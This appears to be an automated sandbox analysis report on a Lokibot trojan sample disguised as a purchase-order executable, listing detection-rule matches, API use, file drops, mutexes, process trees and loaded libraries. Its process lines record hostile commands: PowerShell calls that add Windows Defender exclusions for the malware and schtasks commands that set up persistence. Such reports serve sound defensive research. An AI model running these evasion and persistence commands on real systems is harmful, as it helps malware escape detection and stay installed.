Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: PO-0Y9005373R664.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VvtddClQv.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-0Y9005373R664.exe, fV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: PO-0Y9005373R664.exe, fV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: VvtddClQv.exe.0.dr, fV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: VvtddClQv.exe.0.dr, fV.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, TP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, TP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, TP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, TP.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Gaqf9DrSrRGZEHH27Q.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Gaqf9DrSrRGZEHH27Q.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/17@0/1

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Code function: 14_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

14_2_0040434D

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File created: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB962.tmp

Jump to behavior

Source: PO-0Y9005373R664.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-0Y9005373R664.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO-0Y9005373R664.exe	ReversingLabs: Detection: 52%
Source: PO-0Y9005373R664.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe

File read: C:\Users\user\Desktop\PO-0Y9005373R664.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VvtddClQv.exe C:\Users\user\AppData\Roaming\VvtddClQv.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Section loaded: wldp.dll	Jump to behavior
